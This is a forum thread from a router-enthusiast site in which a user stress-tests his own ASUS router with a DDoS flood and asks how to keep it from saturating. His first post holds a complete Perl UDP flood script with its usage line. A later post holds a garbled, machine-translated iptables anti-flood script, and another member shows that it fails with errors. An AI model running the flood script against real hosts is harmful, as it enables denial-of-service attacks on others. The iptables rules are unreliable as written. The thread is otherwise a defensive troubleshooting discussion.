Dismiss Notice

Welcome To SNBForums

SNBForums is a community for anyone who wants to learn about or discuss the latest in wireless routers, network storage and the ins and outs of building and maintaining a small network.

If you'd like to post a question, simply register and have at it!

While you're at it, please check out SmallNetBuilder for product reviews and our famous Router Charts, Ranker and plenty more!

RT-AC66U_B1 PERL ATTACK

Discussion in 'Asuswrt-Merlin' started by Miguel, Apr 21, 2017 at 5:01 AM.

  1. Miguel

    Miguel Occasional Visitor

    Joined:
    Mar 29, 2017
    Messages:
    10
    Hello everyone I am a little desperate with my router and firmware merlin, I am testing DDOS attacks with a script in perl and my wan and lan are falling, I have the option of firewall and ddos enabled but it is impossible to configure some script in jjfs To prevent the router from saturating itself?
    I need help please

    perl ddos.pl xx.xx.xx.xx 0 1 10
    Code:
    
    #!/usr/bin/perl
    
    #Args
    # 1 - IP
    # 2 - Port
    # 3 - Size of the packet to send
    # 4 - Time in secondes
    
    use Socket;
    use strict;
    
    if ($#ARGV != 3) {
      print "-Tip on use : perl DDoS.pl 8.8.8.8 80 2048 500\n";
      exit(1);
    }
    
    my ($ip,$port,$size,$time) = @ARGV;
    my ($iaddr,$endtime,$psize,$pport);
    $iaddr = inet_aton("$ip") or die "Cannot connect to $ip\n";
    $endtime = time() + ($time ? $time : 1000000);
    socket(flood, PF_INET, SOCK_DGRAM, 17);
    print "~To cancel the attack press \'Ctrl-C\'\n\n";
    print "|IP|\t\t |Port|\t\t |Size|\t\t |Time|\n";
    print "|$ip|\t |$port|\t\t |$size|\t\t |$time|\n";
    print "To cancel the attack press 'Ctrl-C'\n" unless $time;
    for (;time() <= $endtime;) {
      $psize = $size ? $size : int(rand(1500-64)+64) ;
      $pport = $port ? $port : int(rand(65500))+1;
    
      send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}
     
  2. john9527

    john9527 Part of the Furniture

    Joined:
    Mar 28, 2014
    Messages:
    4,136
    Location:
    United States
    If you have DROPPED packet logging turned on during your test, try turning off all packet logging. I've seen that the syslog flood can cause problems.
     
  3. Miguel

    Miguel Occasional Visitor

    Joined:
    Mar 29, 2017
    Messages:
    10
    Logged packets type (NONE)
     
  4. ColinTaylor

    ColinTaylor Part of the Furniture

    Joined:
    Mar 31, 2014
    Messages:
    2,530
    Location:
    UK
    You need to be testing this from the internet side. It won't work if you're testing from your LAN.
     
  5. RMerlin

    RMerlin Part of the Furniture

    Joined:
    Apr 14, 2012
    Messages:
    22,042
    Location:
    Canada
    And running Perl on the router's limited CPU and RAM is probably not a good idea either.
     
  6. Miguel

    Miguel Occasional Visitor

    Joined:
    Mar 29, 2017
    Messages:
    10
    I am sending the attack from a vps to my home where the asus router is, with a connection of 100mbps but my connection is 300mbps, it seems to be overloading the router in packets
     
  7. Miguel

    Miguel Occasional Visitor

    Joined:
    Mar 29, 2017
    Messages:
    10
    When I launch my attack and the router becomes accessible again I see these log.

    Code:
    Apr 21 17:20:02 kernel: DROP IN=eth0 OUT= MAC=50:32:75:e7:6d:a4:00:17:10:8b:d2:87:08:00 SRC=IP VPS DST=IP ASUS LEN=29 TOS=0x00 PREC=0x00 TTL=46 ID=1539 DF PROTO=UDP SPT=34309 DPT=57378 LEN=9
    Apr 21 17:20:02 kernel: DROP IN=eth0 OUT= MAC=50:32:75:e7:6d:a4:00:17:10:8b:d2:87:08:00 SRC=IP VPS DST=IP ASUS LEN=29 TOS=0x00 PREC=0x00 TTL=46 ID=65474 DF PROTO=UDP SPT=34309 DPT=46671 LEN=9
    Apr 21 17:20:02 kernel: DROP IN=eth0 OUT= MAC=50:32:75:e7:6d:a4:00:17:10:8b:d2:87:08:00 SRC=IP VPS DST=IP ASUS LEN=29 TOS=0x00 PREC=0x00 TTL=46 ID=4599 DF PROTO=UDP SPT=34309 DPT=63405 LEN=9
    I have hundreds of equal entries, I think the router is not able to block so many packets, I have a more basic router and supports the load better
     
  8. john9527

    john9527 Part of the Furniture

    Joined:
    Mar 28, 2014
    Messages:
    4,136
    Location:
    United States
    I thought you said you had packet logging off????
     
    cybrnook likes this.
  9. Miguel

    Miguel Occasional Visitor

    Joined:
    Mar 29, 2017
    Messages:
    10
    It activates so that they could see the log, but always it is disabled
     
  10. Miguel

    Miguel Occasional Visitor

    Joined:
    Mar 29, 2017
    Messages:
    10
    I load script on router asus

    But without results, I sadly bought the router thought it would solve some problem of my attacks but I see that throw the money.
    Code:
    ]
    
    Como utilizar # Se Declara El Golpe de la ONU de Como
    
    #! / Bin / bash
    
    # Se crean los Archivos Donde sí alojaran las IPs Para Las Listas Negras;
    
    iptables -A -m listanegra Reciente --name blacklist_180 --rcheck --seconds 180 "Denegar Los Paquetes De Las Direcciones IP ingresadas Por Un Negra La Lista 180 segundos" -m comentario --comment -j DROP
    
    # Detener el ICMP Flood
    #Crear la Cadena parrafo inundación ICMP
    iptables -N cadena-ICMP-inundación
    
    # Detectado Saltar a la Cadena ES Cuando El ICMP
    iptables -p icmp -j Entrada Cadena-ICMP-Inundaciones
    
    # Salir de la Cadena, Si La tasa de Paquetes De La Misma IP es inferior a 4 por Segundo con Una ráfaga de 8 por Segundo
    iptables -A -m Límite-Cadena ICMP-inundación --limit 4 / s --limit-burst 8 -m comentario --comment "margen de Límite ICMP" -j RETORNO
    
    # Registros de inundación CUANDO La tasa es mas alta
    iptables -A cadena-ICMP-inundación Límite -m --limit 6 / h --limit-burst 1 -j LOG --log-prefijo "Cortafuegos: Probable inundación ICMP"
    
    # Mandar Una Lista Negra a por la IP 3 Minutos
    iptables -A cadena-ICMP-inundación -m Reciente --name blacklist_180 --set -m comentario --comment "ListaNegra origen IP" -j DROP
    
    Inundaciones # Detener el UDP
    
    parrafo Inundaciones UDP # Crear la Cadena
    iptables -N cadena-udp-inundación
    
    # Detectado Saltar a la cadena Cuando El UDP es
    iptables -A ENTRADA udp p -j Cadena-UDP-Inundaciones
    
    # Limitar la Velocidad UDP a 10 / Segundos con limite de 20
    iptables -A -m Límite Cadena-UDP-inundación --limit 10 / s --limit estallar-20 -m comentario --comment "Limite Velocidad UDP" -j RETURN
    
    # Iniciar sesión
    iptables -A Límite -m cadena-udp-inundación --limit 6 / h --limit-burst 1 -j LOG --log-prefijo "Cortafuegos: Probable inundación udp"
    
    # Denegados POR flooders 3 Minutos Parr
    iptables -A cadena-UDP-inundación -m Reciente --name blacklist_180 --set -m comentario --comment "ListaNegra origen IP" -j DROP
    
    Inundaciones SYN # Detener
    
    # Crear la Cadena syn-Inundaciones
    iptables -N cadena-syn-inundación
    
    # Saltar a la cadena sin-inundación Cuando El paquete es detectado
    iptables -p TCP ENTRADA --syn -J Cadena-syn-Inundaciones
    
    # Limitar la tasa de Paquetes De Dos por Segundo, Con Un 6 por Segunda ráfaga
    iptables -A -m Límite Cadena-syn-inundación --limit 2 / s --limit-burst 6 -m comentario --comment "Limitar Velocidad TCP SYN" -j RETURN
    
    flooders # Entrar
    iptables -A Límite -m cadena-syn-inundación --limit 6 / h --limit-burst 1 -j LOG --log-prefijo "Cortafuegos: Probable inundación syn"
    
    # Prohibir flooders por 3 Minutos
    iptables -A cadena-syn-inundación -m Reciente --name blacklist_180 --set -m Comentar --comment soltar "IP de origen de Lista negra" -j
    
    Inundación # Detener Otros Tipos de Ataques de SYN
    iptables -p tcp ENTRADA! --syn comentario -m NUEVO --comment estado -m --state "Cortar La Conexión TCP SYN Que No empiezan por" -j DROP [/ code]
     
  11. ColinTaylor

    ColinTaylor Part of the Furniture

    Joined:
    Mar 31, 2014
    Messages:
    2,530
    Location:
    UK
    I hope you are not trying to use that script because it is full of errors.
    Code:
    # iptables -A -m listanegra Reciente --name blacklist_180 --rcheck --seconds 180 "Denegar Los Paquetes De Las Direcciones IP ingresadas Por Un Negra La Lista 180 segundos" -m comentario --comment -j DROP
    Bad argument `listanegra'
    Try `iptables -h' or 'iptables --help' for more information.
    
    # iptables -N cadena-ICMP-inundacin
    
    # iptables -p icmp -j Entrada Cadena-ICMP-Inundaciones
    Bad argument `Cadena-ICMP-Inundaciones'
    Try `iptables -h' or 'iptables --help' for more information.
    
    # iptables -A -m Lmite-Cadena ICMP-inundacin --limit 4 / s --limit-burst 8 -m comentario --comment "margen de Lmite ICMP" -j RETORNO
    Bad argument `Lmite-Cadena'
    Try `iptables -h' or 'iptables --help' for more information.
    
    #
     
  12. Miguel

    Miguel Occasional Visitor

    Joined:
    Mar 29, 2017
    Messages:
    10
    Maybe that does not work, is there any script that can load in the asus? My knowledge in iptables are scarce, is there any way to avoid synflood? The iptables that brings by default does drop but the router gets saturated.and I lose the wan and lan.
    Sorry my bad english


    When I launch the attack from the vps to my home with the Asus router does not respond to the gateway lan to ping until the attack ends
     
    Last edited: Apr 21, 2017 at 4:29 PM
  13. ChatmanR

    ChatmanR Occasional Visitor

    Joined:
    Nov 13, 2009
    Messages:
    24
    Because this message has the words "perl attack" in the link, I had to Avast disable my A/V just to view and post...good luck with your script.
     

Share This Page